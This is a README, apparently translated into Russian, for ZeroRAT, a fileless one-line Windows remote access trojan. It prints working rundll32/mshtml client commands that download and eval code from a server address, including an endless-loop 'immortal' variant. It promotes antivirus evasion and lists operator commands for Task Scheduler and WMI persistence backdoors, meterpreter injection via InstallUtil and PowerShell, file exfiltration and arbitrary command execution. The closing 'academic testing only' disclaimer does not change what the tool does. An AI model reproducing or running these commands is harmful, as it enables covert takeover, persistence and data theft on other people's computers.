
ZeroRAT — это однострочный RAT (троян удалённого доступа) для Windows.
#ZeroRAT ##Введение Удалённое управление (RAT) для Windows: клиенту нужно выполнить всего одну команду. Выполнение происходит через штатные программы Windows, файлы на диск не записываются, что обеспечивает естественный обход антивируса. После перезагрузки перестаёт работать.
В программе download и upload рассматриваются с точки зрения клиента. Скачивание файла клиентом с сервера называется download, загрузка файла клиентом на сервер — upload.
##Конфигурация Измените адрес подключения клиента и пароль администратора панели в config.py. Не забудьте проверить и отключить debug.
Программа зависит от flask и sqlite3, установите их через pip.
##Клиент
Замените <ip>:<port> на фактический адрес подключения.
Обычная версия
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
Бессмертная версия
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##Сервер
Панель: http://<ip>:<port>/server/
Сервер поддерживает следующие команды:
sessions — вывести список активных клиентовuse <id> — выбрать клиента по idset <key> <value> — задать глобальную переменнуюshow globals/downloads/uploads — просмотреть глобальные переменные, файлы, доступные клиенту для скачивания, и файлы, загруженные клиентомdelete session — удалить текущего клиентаdelete download/upload <id> — удалить файл по idupfile — загрузить файл на сервер и добавить его в список downloadsdownload — задайте переменные download_file и download_save_path, и клиент скачает файл и сохранит его в download_save_pathupload — задайте переменную upload_file, и клиент загрузит файл upload_file на серверbackdoor tasks <time> — оставить бэкдор через планировщик задач Windows, формат времени 00:00backdoor wmi — оставить бэкдор через WMI, выполняется каждый часmeterpreter shellcode — внедрение meterpreter способом выполнения shellcode через InstallUtil; предварительно нужно задать LHOST и LPORT (команды снова принимаются только после migrate, зависит от .NET Framework 2.0)meterpreter powershell — внедрение meterpreter через PowerShell (зависит от PowerShell 1.0)Все команды, кроме перечисленных выше, выполняются как системные команды Windows.
Подробнее о командах см. /static/js/xkcd_cli.js
##Разработка Команды бэкенда для клиента: /static/js/xkcd_cli.js
Команды бэкенда для сервера: /controllers/server.py
Клиент: /controllers/client.py
Генерация payload для клиента: payload.py
Работа с базой данных: /models/
##Контакты http://5alt.me
md5_salt [AT] qq.com
##Справочные материалы https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##Отказ от ответственности При использовании данного инструмента соблюдайте местные законы. Инструмент предназначен только для академического тестирования. Категорически запрещается незаконное управление чужими компьютерами. В случае причинения ущерба автор ответственности не несёт.
##License GPLV3
##TODO